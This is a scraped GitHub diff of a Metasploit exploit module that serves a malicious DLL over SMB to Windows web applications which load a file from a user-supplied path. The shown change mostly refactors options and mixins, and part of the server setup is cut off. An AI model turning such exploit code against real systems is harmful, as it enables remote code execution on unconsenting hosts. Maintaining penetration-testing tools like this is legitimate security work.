You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: modules/exploits/windows/http/generic_http_dll_server.rb
+9-27Lines changed: 9 additions & 27 deletions
Original file line number
Diff line number
Diff line change
@@ -10,7 +10,7 @@
10
10
11
11
classMetasploit3 < Msf::Exploit::Remote
12
12
includeMsf::Exploit::Remote::HttpClient
13
-
includeMsf::Exploit::Remote::SMBFileServer
13
+
includeMsf::Exploit::Remote::SMB::Server::Share
14
14
includeMsf::Exploit::EXE
15
15
16
16
definitialize(info={})
@@ -47,37 +47,20 @@ def initialize(info={})
47
47
))
48
48
register_options(
49
49
[
50
-
OptString.new('UNCPATH',[false,'Override the UNC path to use an existing SMB Server(Ex: \\\\192.168.1.1\\share\\exploit.dll)']),
50
+
OptString.new('FILE_NAME',[false,'DLL File name to share','exploit.dll']),
51
51
OptString.new('URI',[true,'Path to vulnerable URI (last argument will be the location of the file shared)','/path/to/vulnerable/function.ext?argument=']),
52
52
OptBool.new('StripExt',[false,'Boolean to whether I should strip the file extension (e.g. foo.dll => foo)',true]),
53
53
],self.class)
54
+
deregister_options('FILE_CONTENTS')
54
55
end
55
56
56
-
defstart_server
57
-
if(datastore['UNCPATH'])
58
-
@unc=datastore['UNCPATH']
59
-
print_status("Remember to share the malicious DLL payload as #{@unc}")
0 commit comments